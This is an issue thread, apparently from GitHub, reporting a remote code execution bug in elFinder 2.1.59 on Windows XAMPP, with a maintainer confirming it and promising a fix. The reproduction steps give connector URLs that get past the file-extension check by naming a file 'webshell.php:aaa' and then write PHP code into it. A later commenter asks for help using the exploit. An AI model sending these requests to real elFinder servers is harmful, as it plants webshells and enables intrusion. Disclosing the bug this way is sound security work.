RCE elFinder 2.1.59

[Ph33rr]

Describe the bug

bypass ext check

Steps to reproduce the behavior:

1. create a .php file using the following URL:
   http://127.0.0.1/elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=webshell.php:aaa
   2.Hash file :
   http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
   3.Add PHP code in webshell.php
   http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=put&content=jpeg<?php echo $_GET["infosec_90"]&target=HashFile

p (please complete the following information):**

• OS: Windows XAMPP

[nao-pon]

@Ph33rr

We cannot create such a file with the default configuration.

http://127.0.0.1/elFinder-2.1.59/php/connector.minimal.php?cmd=mkfile&name=webshell.php:aaa&target=l1_Lw

then got result was

{"error":["errMkfile","webshell.php:aaa"]}

on XAMPP for Windows 7.3.11

[Ph33rr]

now open :
http://127.0.0.1/2/elFinder/php/connector.minimal.php?cmd=open&target=l1_
you will see webshell.php file

[nao-pon]

ah I see. understood.

Hmmm, I know there are some madcap people who use XAMPP as a public server. I have to fix it. Hah.

[nao-pon]

@Ph33rr I am very grateful for your contribution! 👍

[aliraza7989]

Hello there
I need assistance in this exploit